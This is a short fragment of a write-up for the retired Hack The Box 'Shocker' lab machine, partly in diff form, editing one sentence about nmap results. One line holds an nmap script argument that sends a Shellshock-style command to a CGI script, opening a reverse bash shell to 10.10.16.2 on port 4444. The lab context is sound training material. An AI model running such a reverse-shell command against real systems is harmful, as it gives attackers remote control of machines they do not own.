This is a writeup for the retired Hack The Box Shocker machine.

 --script-args uri=/cgi-bin/user.sh,cmd="/bin/bash -i >& /dev/tcp/10.10.16.2/4444 0>&1 & disown"

-Nmap shows us the following (abbreviated) result:
+Nmap shows the following (abbreviated) results:

 Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-17 09:44 JST